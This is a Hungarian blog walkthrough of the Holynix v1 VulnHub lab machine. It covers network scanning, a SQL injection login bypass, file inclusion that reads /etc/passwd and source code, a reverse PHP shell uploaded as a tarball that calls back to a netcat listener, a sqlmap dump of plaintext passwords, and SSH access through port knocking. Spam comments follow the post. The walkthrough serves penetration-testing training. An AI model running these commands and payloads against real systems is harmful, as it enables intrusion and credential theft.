2013. november 10., vasárnap

Holynix -1 (Scanning + Enumeration)

Előkészület:
Letöltés : http://vulnhub.com/entry/holynix_v1,20/
Mac address : findstr "ethernet0.g" holynix.vmx
ethernet0.generatedAddress = "00:0c:29:bc:05:de"
ethernet0.generatedAddressOffset = "0"
VirtualBox. New machine, Host Only network, change mac address 000c29bc05de

Scanning:
1.Checking live systems
netdiscover -r 192.168.56.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                      
                                                                                                                                                    
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                    
 _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor                  
 -----------------------------------------------------------------------------
 192.168.56.1    08:00:27:00:9c:e8    01    060   CADMUS COMPUTER SYSTEMS                                                                           
 192.168.56.100  08:00:27:a5:50:60    01    060   CADMUS COMPUTER SYSTEMS                                                                           
 192.168.56.102  00:0c:29:bc:05:de    01    060   VMware, Inc.      

 2. Check open ports
unicornscan 192.168.56.102
TCP open                http[   80]        from 192.168.56.102  ttl 64
 3.fingerprint the os & services
nmap -sV -sS -O 192.168.56.102 -pT:80
Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-09 14:22 CET
Nmap scan report for 192.168.56.102
Host is up (0.00086s latency).
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch)
MAC Address: 00:0C:29:BC:05:DE (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.24 - 2.6.25 (99%), Linux 2.6.35 (95%), Linux 2.6.22 (SPARC) (95%), Linux 2.6.9 - 2.6.33 (94%), Linux 2.6.22 (embedded, ARM) (93%), Linux 2.6.16 (93%), Linksys WRV54G WAP (93%), Linux 2.6.18 - 2.6.24 (93%), ipTIME PRO 54G WAP (93%), Android 4.0.4 (Linux 2.6) (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.33 seconds
 4. scan for vulnerabilities
 nikto -host 192.168.56.102
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.56.102
+ Target Hostname:    192.168.56.102
+ Target Port:        80
+ Start Time:         2013-11-09 14:25:53 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.12
+ The anti-clickjacking X-Frame-Options header is not present.
+ PHP/5.2.4-2ubuntu5.12 appears to be outdated (current is at least 5.4.4)
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ /index.php?page=../../../../../../../../../../etc/passwd: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page=../../../../../../../../../../boot.ini: PHP include error may indicate local or remote file inclusion is possible.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-2562: /login/sm_login_screen.php?error=\">: SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2562: /login/sm_login_screen.php?uid=\">: SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3092: /home/: This might be interesting...
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3092: /login/: This might be interesting...
+ OSVDB-3092: /misc/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /icons/README, inode: 13372, size: 5108, mtime: 0x438c0358aae80
+ OSVDB-3233: /icons/README: Apache default file found.
+ /index.php?module=PostWrap&page=http://cirt.net/rfiinc.txt?: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page=http://cirt.net/rfiinc.txt?: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page=http://cirt.net/rfiinc.txt?: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page=http://cirt.net/rfiinc.txt??: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page[path]=http://cirt.net/rfiinc.txt??&cmd=ls: PHP include error may indicate local or remote file inclusion is possible.
+ /login.php: Admin login page/section found.
+ 6544 items checked: 0 error(s) and 24 item(s) reported on remote host
+ End Time:           2013-11-09 14:26:06 (GMT1) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

 dirb http://192.168.56.102/
-----------------
DIRB v2.03   
By The Dark Raver
-----------------

START_TIME: Sat Nov  9 14:27:06 2013
URL_BASE: http://192.168.56.102/
WORDLIST_FILES: wordlists/common.txt

-----------------

GENERATED WORDS: 1942                                                         
                                                                              
---- Scanning URL: http://192.168.56.102/ ----
+ http://192.168.56.102/cgi-bin/                                              
    (FOUND: 403 [Forbidden] - Size: 330)
+ http://192.168.56.102/footer                                                
    (FOUND: 200 [Ok] - Size: 63)
+ http://192.168.56.102/header                                                
    (FOUND: 200 [Ok] - Size: 604)
+ http://192.168.56.102/home                                                  
    (FOUND: 200 [Ok] - Size: 109)
+ http://192.168.56.102/img/                                                  
    ==> DIRECTORY
+ http://192.168.56.102/index                                                 
    (FOUND: 200 [Ok] - Size: 776)
+ http://192.168.56.102/login                                                 
    (FOUND: 200 [Ok] - Size: 342)
+ http://192.168.56.102/misc/                                                 
    ==> DIRECTORY
+ http://192.168.56.102/transfer                                              
    (FOUND: 200 [Ok] - Size: 44)
+ http://192.168.56.102/upload/                                               
    ==> DIRECTORY
+ http://192.168.56.102/~bin/                                                 
    ==> DIRECTORY
+ http://192.168.56.102/~mail/                                                
    ==> DIRECTORY
+ http://192.168.56.102/~sys/                                                 
    ==> DIRECTORY
                                                                              
---- Entering directory: http://192.168.56.102/img/ ----
+ http://192.168.56.102/img/index                                             
    (FOUND: 200 [Ok] - Size: 26)
                                                                              
---- Entering directory: http://192.168.56.102/misc/ ----
+ http://192.168.56.102/misc/index                                            
    (FOUND: 200 [Ok] - Size: 26)
                                                                              
---- Entering directory: http://192.168.56.102/upload/ ----
+ http://192.168.56.102/upload/index                                          
    (FOUND: 200 [Ok] - Size: 26)
                                                                              
---- Entering directory: http://192.168.56.102/~bin/ ----
+ http://192.168.56.102/~bin/cat                                              
    (FOUND: 200 [Ok] - Size: 27312)
+ http://192.168.56.102/~bin/cp                                               
    (FOUND: 200 [Ok] - Size: 71664)
+ http://192.168.56.102/~bin/date                                             
    (FOUND: 200 [Ok] - Size: 55820)
+ http://192.168.56.102/~bin/dir                                              
    (FOUND: 200 [Ok] - Size: 92376)
+ http://192.168.56.102/~bin/ip                                               
    (FOUND: 200 [Ok] - Size: 183288)
+ http://192.168.56.102/~bin/login                                            
    (FOUND: 200 [Ok] - Size: 35272)
+ http://192.168.56.102/~bin/ls                                               
    (FOUND: 200 [Ok] - Size: 92376)
+ http://192.168.56.102/~bin/more                                             
    (FOUND: 200 [Ok] - Size: 27752)
+ http://192.168.56.102/~bin/mount                                            
    (FOUND: 200 [Ok] - Size: 81368)
+ http://192.168.56.102/~bin/mt                                               
    (FOUND: 200 [Ok] - Size: 28492)
+ http://192.168.56.102/~bin/netstat                                          
    (FOUND: 200 [Ok] - Size: 101228)
+ http://192.168.56.102/~bin/ping                                             
    (FOUND: 200 [Ok] - Size: 30856)
+ http://192.168.56.102/~bin/ps                                               
    (FOUND: 200 [Ok] - Size: 65360)
+ http://192.168.56.102/~bin/pwd                                              
    (FOUND: 200 [Ok] - Size: 27252)
+ http://192.168.56.102/~bin/tar                                              
    (FOUND: 200 [Ok] - Size: 234132)
                                                                              
---- Entering directory: http://192.168.56.102/~mail/ ----
                                                                              
---- Entering directory: http://192.168.56.102/~sys/ ----
+ http://192.168.56.102/~sys/console                                          
    (FOUND: 403 [Forbidden] - Size: 334)
+ http://192.168.56.102/~sys/core                                             
    (FOUND: 403 [Forbidden] - Size: 331)
+ http://192.168.56.102/~sys/disk/                                            
    ==> DIRECTORY
+ http://192.168.56.102/~sys/full                                             
    (FOUND: 200 [Ok] - Size: 0)
+ http://192.168.56.102/~sys/input/                                           
    ==> DIRECTORY
+ http://192.168.56.102/~sys/log                                              
    (FOUND: 403 [Forbidden] - Size: 330)
+ http://192.168.56.102/~sys/net/                                             
    ==> DIRECTORY
+ http://192.168.56.102/~sys/null                                             
    (FOUND: 200 [Ok] - Size: 0)
+ http://192.168.56.102/~sys/random                                           
    (FOUND: 200 [Ok] - Size: 0)
                                                                              
---- Entering directory: http://192.168.56.102/~sys/disk/ ----
                                                                              
---- Entering directory: http://192.168.56.102/~sys/input/ ----
                                                                              
---- Entering directory: http://192.168.56.102/~sys/net/ ----
                                                                              
-----------------
DOWNLOADED: 19420 - FOUND: 31
 Enumeration
 4.enumeration services
 Mantra http://192.168.56.102
 5. input fields
 index.php?page=login.php
 6.break login procedure
enable hack bar, enable post data, load url
user_name=admin&password=' or (1=1)#&Submit_button=Submit
7. enumeration
View page source
 - ?page=employeedir.php
 - ?page=messageboard.php
 - ?page=calender.php
 - ?page=upload.php
 - ?page=ssp.php
 - ?do=logout
 8. identification
Cookie: uid=1
Cookies Manager Edit uid 1,2,3,4,5,6,7,8,9,10,11
 9. more enumeration
employeedir.php
- img/blabla.jpg
- email addresses , usernames?
messageboard.php
 - knockknock
- Changetrack
calender.php
 - nothing
upload.php
 - Fájl feltöltése valahova
 - transfer.php
ssp.php
 - Local File Inclusion error
 - text_file_name=ssp%2Femail.txt&B=Display+File
fimap -s -b --cookie="uid=2" --post="text_file_name=ssp%2Femail.txt&B=Display+File" -u "http://192.168.56.102/index.php?page=ssp.php"
fimap v.09 (For the Swarm)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

Blind FI-error checking enabled.
SingleScan is testing URL: 'http://192.168.56.102/index.php?page=ssp.php'
[15:32:43] [OUT] Inspecting URL 'http://192.168.56.102/index.php?page=ssp.php'...
[15:32:43] [INFO] Fiddling around with URL...
[15:32:43] [INFO] Sniper failed. Going blind...
[15:32:44] [OUT] Possible file inclusion found blindly! -> 'http://192.168.56.102/index.php?page=ssp.php' with POST-Parameter 'text_file_name'.
[15:32:44] [OUT] Identifying Vulnerability 'http://192.168.56.102/index.php?page=ssp.php' with Parameter 'text_file_name' blindly...
[15:32:44] [WARN] Unknown language - Autodetecting...
[15:32:44] [INFO] Autodetect thinks this could be a PHP-Script...
[15:32:44] [INFO] If you think this is wrong start fimap with --no-auto-detect
[15:32:44] [INFO] Testing file '/etc/passwd'...
[15:32:44] [INFO] Testing file '/proc/self/environ'...
[15:32:44] [INFO] Testing file 'php://input'...
[15:32:44] [INFO] Testing file '/var/log/apache2/access.log'...
[15:32:44] [INFO] Testing file '/var/log/apache/access.log'...
[15:32:44] [INFO] Testing file '/var/log/httpd/access.log'...
[15:32:44] [INFO] Testing file '/var/log/apache2/access_log'...
[15:32:44] [INFO] Testing file '/var/log/apache/access_log'...
[15:32:44] [INFO] Testing file '/var/log/httpd/access_log'...
[15:32:44] [INFO] Testing file 'http://www.phpbb.de/index.php'...
##################################################################
#[1] Possible PHP-File Inclusion                                 #
##################################################################
#::REQUEST                                                       #
#  [URL]        http://192.168.56.102/index.php?page=ssp.php     #
#  [POST]       text_file_name=ssp%2Femail.txt&B=Display+File    #
#  [HEAD SENT]  Cookie                                           #
#::VULN INFO                                                     #
#  [POSTPARM]   text_file_name                                   #
#  [PATH]       Not received (Blindmode)                         #
#  [OS]         Unix                                             #
#  [TYPE]       Blindly Identified                               #
#  [TRUNCATION] Not tested.                                      #
#  [READABLE FILES]                                              #
#                   [0] /etc/passwd                              #
##################################################################
 - text_file_name=/etc/passwd&B=Display+File
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:114:MySQL Server,,,:/var/lib/mysql:/bin/false
alamo:x:1000:115::/home/alamo:/bin/bash
etenenbaum:x:1001:100::/home/etenenbaum:/bin/bash
gmckinnon:x:1002:100::/home/gmckinnon:/bin/bash
hreiser:x:1003:50::/home/hreiser:/bin/bash
jdraper:x:1004:100::/home/jdraper:/bin/bash
jjames:x:1005:50::/home/jjames:/bin/bash
jljohansen:x:1006:115::/home/jljohansen:/bin/bash
ltorvalds:x:1007:113::/home/ltorvalds:/bin/bash
kpoulsen:x:1008:100::/home/kpoulsen:/bin/bash
mrbutler:x:1009:50::/home/mrbutler:/bin/bash
rtmorris:x:1010:100::/home/rtmorris:/bin/bash
Error message: text_file_name=ssp%2a&B=Display+File
Warning:  fopen(ssp*) [function.fopen]: failed to open stream: No such file or directory in /var/apache2/htdocs/ssp.php on line 29

Warning:  stream_get_contents() expects parameter 1 to be resource, boolean given in /var/apache2/htdocs/ssp.php on line 30

Warning:  fclose(): supplied argument is not a valid stream resource in /var/apache2/htdocs/ssp.php on line 31
ssp.php : text_file_name=ssp.php&B=Display+File

<!--?php
if ( $auth == 0 ) {
        echo "<center--><h2>Content Restricted</h2>";
} else {
    echo "<center><h4><b>Standard Security Practices</b></h4></center><p>";
    echo "</p><form method="\&quot;POST\&quot;" action="\&quot;&quot;" .$_server['script_name']="" .="" "?"="" $_server['query_string']="" "\"="">";

    echo "<p><select size="1" name="text_file_name">";
    echo "<option value="ssp/email.txt">Email";
    echo "</option>";
    echo "<option value="ssp/acceptable_use.txt">Acceptable Use";
    echo "</option>";
    echo "<option value="ssp/internet_use.txt">Internet Use";
    echo "</option>";
    echo "<option value="ssp/software_installation.txt">Software Installation";
    echo "</option>";
    echo "<option value="ssp/malware.txt">Malware";
    echo "</option>";
    echo "<option value="ssp/auditing.txt">Auditing";
    echo "</option>";
    echo "</select></p>";
    echo "<p><input value="Display File" name="B" type="submit"></p>";
    echo "</form>";
    echo "<pre>";

    $textfilename=$_REQUEST["text_file_name"];

    if ($textfilename &lt;&gt;"") {
        $handle = fopen($textfilename, "r");
        echo stream_get_contents($handle);
        fclose($handle);
    }
    echo "</pre>";
}
?&gt;
index.php : text_file_name=index.php&B=Display+File
<!--?php
include ("header.php");
// Grab inputs
$page = $_GET[page];
if ($page=="") { include ("home.php"); }
else {
        $query = "SELECT location FROM page WHERE location = '". $page ."'";
        $result = mysql_query($query);
        $row = mysql_fetch_array($result, MYSQL_ASSOC);
        if ( file_exists($row{'location'}) ) { include($row{'location'}); } else { include("404.html"); }

}
include ("footer.php");
?-->

home.php


<!--?php
if ( $auth == 0 ) { echo "<center--><h3>You must login to access restricted content</h3>"; }
if ( $auth == 1 ) { echo "<center><h3>Welcome to the Nakimura Industries Production Server</h3></center>"; }

?-->

login.php :

<!--?php
if ($failedloginflag==1) {
    echo '<h2--><font color="#ff0000">Bad user name or password!</font>';
    echo "If you continue to have problems logging in contact<br>the system administrator at ltorvalds@example.net<br><br>";
}
echo "<form method="\&quot;POST\&quot;" action="\&quot;&quot;" .$_server['script_name']="" .="" "?"="" $_server['query_string']="" "\"="">";
?&gt;
    <p>Enter your username and password:</p>
    <p>Name:<br><input name="user_name" size="20" type="text"></p>
    <p>Password:<br><input name="password" size="20" type="password"></p>
    <p><input value="Submit" name="Submit_button" type="submit"></p>
</form>
<!--?php
?-->

header.php
A header.php-t alapból nem lehetett lekérdezni ezért ezt WebScarab segítségével tudtam kiprintelni.
A lényeges és fontos dolgok ebben voltak az autentikációval kapcsolatban:
<?php
include '../config.inc';
include '../opendb.inc';

// Grab inputs
$username = $_REQUEST["user_name"];
$password = $_REQUEST["password"];
$surname = $_REQUEST["surname"];
$dosomething = $_REQUEST["do"];

if ($username <> "" and $password <> "") {
    $query  = "SELECT * FROM accounts WHERE username='". $username ."' AND password='".stripslashes($password)."'";
    $result = mysql_query($query) or die('<b>SQL Error:</b>' . mysql_error($conn) . '<p><b>SQL Statement:</b>' . $query);
    if (mysql_num_rows($result) > 0) {
        $row = mysql_fetch_array($result, MYSQL_ASSOC);
        setcookie("uid", $row['cid']);
        $failedloginflag=0;
        echo '<meta http-equiv="refresh" content="0;url=index.php">';
    } else {
        $failedloginflag=1;
    }
}

switch ($dosomething) {
    case "logout":
        setcookie('uid','',1);
        break;
}

?>
<html><head>
<?php
if ($dosomething  == "logout") {
    echo '<meta http-equiv="refresh" content="0;url=index.php">';
    $auth = 0;
}
?>
</head>
<body bgcolor="#00bbcc">
<table border="0" width="100%" cellspacing="0" cellpadding="0">
    <tr><td bgcolor="#00bbcc"align="center" colspan="2">
        <table width="100%">
        <td valign="top"><br></td>
        <td align="center" valign="top"><h1><b>Nakimura Industries Production Server</b></h1>
        <?php
        $query  = "SELECT * FROM accounts WHERE cid='".$_COOKIE["uid"]."'";
        $result = mysql_query($query) or die('Error Connecting to Database');
        echo mysql_error($conn);
        echo mysql_error($conn);
        if (mysql_num_rows($result) > 0) {
            while($row = mysql_fetch_array($result, MYSQL_ASSOC))
            {
                $logged_in_user = $row['username'];
                $upload = $row['upload'];
                $auth = 1;
                echo "Welcome, " .$logged_in_user. ".";
            }
        } else {
            $logged_in_user = "anonymous";
            $auth = 0;
            echo '<font color="#ff0000">Not logged in</font>';
        }
        ?>
        </td>
        </table>
    </td></tr>
    <tr>
        <td bgcolor="#00bbcc" valign="top" width="12%">
        <hr>
        <a href="index.php">Home</a><br>
        <?php
        if ( $auth == 0 ) { echo "<a href='?page=login.php'>Login</a><br />"; }
        if ( $auth == 1 ) {
            echo "<a href='?page=employeedir.php'>Directory</a><br />";
            echo "<a href='?page=messageboard.php'>Message Board</a><br />";
            echo "<a href='?page=calender.php'>Calender</a><br />";
            echo "<a href='?page=upload.php'>Upload</a><br />";
            echo "<a href='?page=ssp.php'>Security</a><br />";
            echo "<a href='?do=logout'>Logout</a><br />";
        }
        ?>
        <hr>
        </td>
        <td  valign="top" width="80%">
        <blockquote>

../config.inc

<?php
$dbhost = 'localhost';
$dbuser = 'root';
$dbpass = 'mY5qLr007p@S5w0rD';
$dbname = 'creds';

?>
../opendb.inc

$conn = mysql_connect($dbhost, $dbuser, $dbpass) or die('Error connecting to mysql');
mysql_select_db($dbname) or die('Error Opening DatabaseSQL Error:' . mysql_error($conn) . 'SQL Statement:' . $query);
?>

upload.php : text_file_name=upload.php&B=Display+File

<!--?php
if ( $auth == 0 ) {
        echo "<center--><h2>Content Restricted</h2>";
} else {
    echo "<h3>Home Directory Uploader</h3>";
    echo "<form enctype="multipart/form-data" action="index.php?page=transfer.php" method="POST">";
    echo "Please choose a file: <input name="uploaded" type="file"><br>";
    echo "<input name="autoextract" value="true" type="checkbox"> Enable the automatic extraction of gzip archives.<br>";
    echo "<input value="Upload" type="submit"></form>";
}
?&gt;
transfer.php

<!--?php
if ( $auth == 0 ) {
        echo "<center--><h2>Content Restricted</h2>";
} else {
    if ( $upload == 1 )
    {
        $homedir = "/home/".$logged_in_user. "/";
        $uploaddir = "upload/";
        $target = $uploaddir . basename( $_FILES['uploaded']['name']) ;
        $uploaded_type = $_FILES['uploaded']['type'];
        $command=0;
        $ok=1;

        if ( $uploaded_type =="application/gzip" &amp;&amp; $_POST['autoextract'] == 'true' ) {    $command = 1; }

        if ($ok==0)
        {
            echo "Sorry your file was not uploaded";
            echo "<a href="?index.php?page=upload.php">Back to upload page</a>";
        } else {
                if(move_uploaded_file($_FILES['uploaded']['tmp_name'], $target))
            {
                echo "<h3>The file '" .$_FILES['uploaded']['name']. "' has been uploaded.</h3><br>";
                echo "The ownership of the uploaded file(s) have been changed accordingly.";
                echo "<br><a href="?page=upload.php">Back to upload page</a>";
                if ( $command == 1 )
                {
                    exec("sudo tar xzf " .$target. " -C " .$homedir);
                    exec("rm " .$target);
                } else {
                    exec("sudo mv " .$target. " " .$homedir . $_FILES['uploaded']['name']);
                }
                exec("/var/apache2/htdocs/update_own");
                } else {
                echo "Sorry, there was a problem uploading your file.<br>";
                echo "<br><a href="?page=upload.php">Back to upload page</a>";
            }
        }
    } else { echo "<br><br><h3>Home directory uploading disabled for user " .$logged_in_user. "</h3>"; }
}
?&gt;
update_own
#!/bin/bash
sudo chown root:root /home/
sudo chown -R alamo:developers /home/alamo/
sudo chown -R nobody:developers /home/development/
sudo chown -R etenenbaum:users /home/etenenbaum/
sudo chown -R gmckinnon:users /home/gmckinnon/
sudo chown -R hreiser:staff /home/hreiser/
sudo chown -R jdraper:users /home/jdraper/
sudo chown -R jjames:staff /home/jjames/
sudo chown -R jljohansen:developers /home/jljohansen/
sudo chown -R kpoulsen:users /home/kpoulsen/
sudo chown -R ltorvalds:admin /home/ltorvalds/
sudo chown -R mrbutler:staff /home/mrbutler/
sudo chown -R rtmorris:users /home/rtmorris/

Exploit (reverse php shell)
nc -l -v -p 1234
listening on [any] 1234 ...
Set Cookie: uid=2
pico revshell.php
$ip = '192.168.56.101';  // CHANGE THIS
tar cvzf revshell.tar.gz revshell.php
upload revshell.tar.gz
http://192.168.56.102/~etenenbaum/revshell.php
192.168.56.102: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.102] 58391
Linux holynix 2.6.24-26-server #1 SMP Tue Dec 1 19:19:20 UTC 2009 i686 GNU/Linux
 14:58:25 up  5:07,  0 users,  load average: 0.13, 0.03, 0.01
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$
$ ls /etc/knockknock.d/profiles
alamo
etenenbaum
gmckinnon
hreiser
jdraper
jjames
jljohansen
kpoulsen
ltorvalds
mrbutler
rtmorris
$ ls /etc/knockknock.d/profiles/etenenbaum -al
total 24
drwxr-xr-x  2 root root 4096 Dec  1  2009 .
drwxr-xr-x 13 root root 4096 Nov  8  2010 ..
-rw-r--r--  1 root root   25 Dec  1  2009 cipher.key
-rw-r--r--  1 root root   27 Dec  1  2009 config
-rw-r--r--  1 root root    3 Nov 18 19:02 counter
-rw-r--r--  1 root root   25 Dec  1  2009 mac.key

$ cat /etc/knockknock.d/profiles/etenenbaum/*
WC8pOHq67KHzuYEvH9qPRA==  <- cipher.key="" i="">
[main]  <- config="" i="">
knock_port = 13821
32 <- counter="" i="">
OcOlArxJEvH7iecDOZGAmw== <- i="" mac.key="">

Exploit (sql injection)


index.php:
   $query = "SELECT location FROM page WHERE location = '". $page ."'";
header.php:
   $query  = "SELECT * FROM accounts WHERE username='". $username ."' AND password='".stripslashes($password)."'";
  $query  = "SELECT * FROM accounts WHERE cid='".$_COOKIE["uid"]."'";


sqlmap -u "http://192.168.56.102/index.php?page=login.php" --cookie="uid=2" --level=5 --risk=5
[WARNING] GET parameter 'page' is not injectable
[WARNING] Cookie parameter 'uid' is not injectable

sqlmap -u "http://192.168.56.102/index.php?page=login.php" --data="user_name=admin&password=pass&Submit_button=Submit"

--dbs

available databases [4]:                                                                                                                           
[*] clients
[*] creds
[*] information_schema
[*] mysql

--dump-all

cat /usr/share/sqlmap/output/192.168.56.102/dump/creds/accounts.csv

cid,upload,username,password
1,0,alamo,Ih%40cK3dM1cR05oF7
2,1,etenenbaum,P3n7%40g0n0wN3d
3,1,gmckinnon,d15cL0suR3Pr0J3c7
4,1,hreiser,Ik1Ll3dNiN%40r315er
5,1,jdraper,p1%40yIngW17hPh0n35
6,1,jjames,%40rR35t3D%40716
7,1,jljohansen,m%40k1nGb0o7L3g5
8,1,kpoulsen,wH%407ar37H3Fed5D01n
9,0,ltorvalds,f%407H3r0FL1nUX
10,1,mrbutler,n%405aHaSw0rM5
11,1,rtmorris,Myd%40d51N7h3NSA

Exploit ssh:
mkdir .knockknock && cd .knockknock && mkdir 192.168.56.102 && cd 192.168.56.102
echo WC8pOHq67KHzuYEvH9qPRA== > cipher.key
echo [main]> config
echo knock_port = 13821 >> config
echo 32 > counter
echo OcOlArxJEvH7iecDOZGAmw== > mac.key
root@kali:~/knockknock-0.7# python knockknock.py -p 22 192.168.56.102
*** Success: knock sent.
ssh gmckinnon@192.168.56.102
gmckinnon@192.168.56.102's password: <- d15cl0sur3pr0j3c7="" i="">
Linux holynix 2.6.24-26-server #1 SMP Tue Dec 1 19:19:20 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
gmckinnon@holynix:~$

gmckinnon@holynix:~$ sudo -l
User gmckinnon may run the following commands on this host:
    (root) /bin/false

gmckinnon@holynix:~$ uname -a
Linux holynix 2.6.24-26-server #1 SMP Tue Dec 1 19:19:20 UTC 2009 i686 GNU/Linux

Next Phase: Privilege escalation......

root@kali:~# searchsploit changetrack
 Description                                                                 Path
--------------------------------------------------------------------------- -------------------------
Changetrack 4.3-3 Local Privilege Escalation Vulnerability                  /linux/local/9709.txt

4 megjegyzés:

  1. If you want your ex-girlfriend or ex-boyfriend to come crawling back to you on their knees (even if they're dating somebody else now) you got to watch this video
    right away...

    (VIDEO) Win your ex back with TEXT messages?

    VálaszTörlés
  2. I'm using AVG protection for a couple of years now, I recommend this solution to all of you.

    VálaszTörlés
  3. BlueHost is definitely one of the best hosting company with plans for any hosting needs.

    VálaszTörlés
  4. QUANTUM BINARY SIGNALS

    Professional trading signals delivered to your cell phone every day.

    Follow our trades NOW & make up to 270% a day.

    VálaszTörlés